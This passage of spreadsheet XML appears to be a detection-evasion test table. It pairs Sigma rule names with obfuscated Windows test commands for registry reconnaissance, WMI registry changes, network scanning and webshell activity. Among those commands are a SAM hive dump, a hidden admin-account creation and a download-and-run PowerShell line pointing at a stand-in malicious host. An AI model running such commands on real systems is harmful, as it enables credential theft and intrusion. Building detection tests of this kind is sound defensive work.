        <v>0</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B11" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C11" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D11" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E11" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B12" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C12" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D12" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E12" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="43" t="n"/>
      <c r="J12" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B13" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C13" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D13" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E13" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F13" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G13" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H13" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="43" t="n"/>
      <c r="J13" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="43" t="n"/>
      <c r="B14" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C14" s="36" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D14" s="36" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E14" s="36" t="inlineStr">
        <is>
          <t>reg.exe save HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="43" t="n"/>
      <c r="B15" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C15" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D15" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E15" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="43" t="n"/>
      <c r="B16" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C16" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D16" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E16" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="43" t="n"/>
      <c r="B17" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C17" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D17" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E17" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F17" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="43" t="n"/>
      <c r="J17" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="43" t="n"/>
      <c r="B18" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C18" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D18" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E18" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="43" t="n"/>
      <c r="J18" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="43" t="n"/>
      <c r="B19" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C19" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D19" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E19" s="36" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="43" t="n"/>
      <c r="J19" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="43" t="n"/>
      <c r="B20" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C20" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D20" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E20" s="36" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="43" t="n"/>
      <c r="B21" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C21" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D21" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E21" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F21" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="43" t="n"/>
      <c r="J21" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="43" t="n"/>
      <c r="B22" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C22" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D22" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E22" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F22" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="43" t="n"/>
      <c r="J22" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="43" t="n"/>
      <c r="B23" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C23" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D23" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E23" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="43" t="n"/>
      <c r="J23" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="43" t="n"/>
      <c r="B24" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C24" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D24" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E24" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="43" t="n"/>
      <c r="J24" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="36" t="n"/>
      <c r="B25" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C25" s="36" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D25" s="36" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E25" s="43" t="inlineStr">
        <is>
          <t>wmic /namespace:\root\microsoftactivedirectory class Microsoft_DomainTrustStatus get /format:list</t>
        </is>
      </c>
      <c r="F25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="43" t="n"/>
      <c r="J25" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K25" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B26" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C26" s="36" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D26" s="36" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E26" s="36" t="inlineStr">
        <is>
          <t>"cmd.exe" /c ipconfig /a^ll</t>
        </is>
      </c>
      <c r="F26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="43" t="n"/>
      <c r="J26" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K26" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B27" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C27" s="36" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D27" s="36" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E27" s="36" t="inlineStr">
        <is>
          <t>"cmd.exe" /c "netsh" "interface" "show" "interface"</t>
        </is>
      </c>
      <c r="F27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="43" t="n"/>
      <c r="J27" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K27" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B28" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C28" s="36" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D28" s="36" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E28" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c set C=config &amp;&amp; net %C% workstation</t>
        </is>
      </c>
      <c r="F28" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="43" t="n"/>
      <c r="J28" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K28" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B29" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C29" s="36" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D29" s="36" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E29" s="36" t="inlineStr">
        <is>
          <t>"cmd.exe" /c arp -"a"</t>
        </is>
      </c>
      <c r="F29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="43" t="n"/>
      <c r="J29" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K29" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B30" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_adfind</t>
        </is>
      </c>
      <c r="C30" s="36" t="inlineStr">
        <is>
          <t>Renamed AdFind Execution</t>
        </is>
      </c>
      <c r="D30" s="36" t="inlineStr">
        <is>
          <t>df55196f-f105-44d3-a675-e9dfb6cc2f2b</t>
        </is>
      </c>
      <c r="E30" s="36" t="inlineStr">
        <is>
          <t>"cmd.exe" /c "C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe" -sc trust""dmp</t>
        </is>
      </c>
      <c r="F30" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G30" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H30" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="36" t="n"/>
      <c r="J30" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K30" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="43" t="n"/>
      <c r="B31" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_scan_loop</t>
        </is>
      </c>
      <c r="C31" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scan Loop Network</t>
        </is>
      </c>
      <c r="D31" s="36" t="inlineStr">
        <is>
          <t>f8ad2e2c-40b6-4117-84d7-20b89896ab23</t>
        </is>
      </c>
      <c r="E31" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "f^o^r /L %i in (1,1,254) do p^i^n^g -n 1 192.168.1.%i"</t>
        </is>
      </c>
      <c r="F31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="36" t="n"/>
      <c r="J31" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K31" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="43" t="n"/>
      <c r="B32" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C32" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D32" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E32" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp; ipconfig &amp; echo"</t>
        </is>
      </c>
      <c r="F32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="43" t="n"/>
      <c r="J32" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K32" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="43" t="n"/>
      <c r="B33" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C33" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D33" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E33" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;dir&amp;&amp;echo [E]"</t>
        </is>
      </c>
      <c r="F33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="43" t="n"/>
      <c r="J33" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K33" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="n"/>
      <c r="B34" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C34" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D34" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E34" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;echo"</t>
        </is>
      </c>
      <c r="F34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K34" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="43" t="n"/>
      <c r="B35" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C35" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D35" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E35" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [E]"</t>
        </is>
      </c>
      <c r="F35" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G35" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K35" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="43" t="n"/>
      <c r="B36" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C36" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D36" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E36" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="43" t="n"/>
      <c r="J36" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="43" t="n"/>
      <c r="B37" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C37" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D37" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E37" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="36" t="n"/>
      <c r="J37" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K37" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="43" t="n"/>
      <c r="B38" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C38" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D38" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E38" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="36" t="n"/>
      <c r="J38" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="43" t="n"/>
      <c r="B39" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C39" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D39" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E39" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -COMmAND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="43" t="n"/>
      <c r="B40" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C40" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D40" s="36" t="inlineStr">
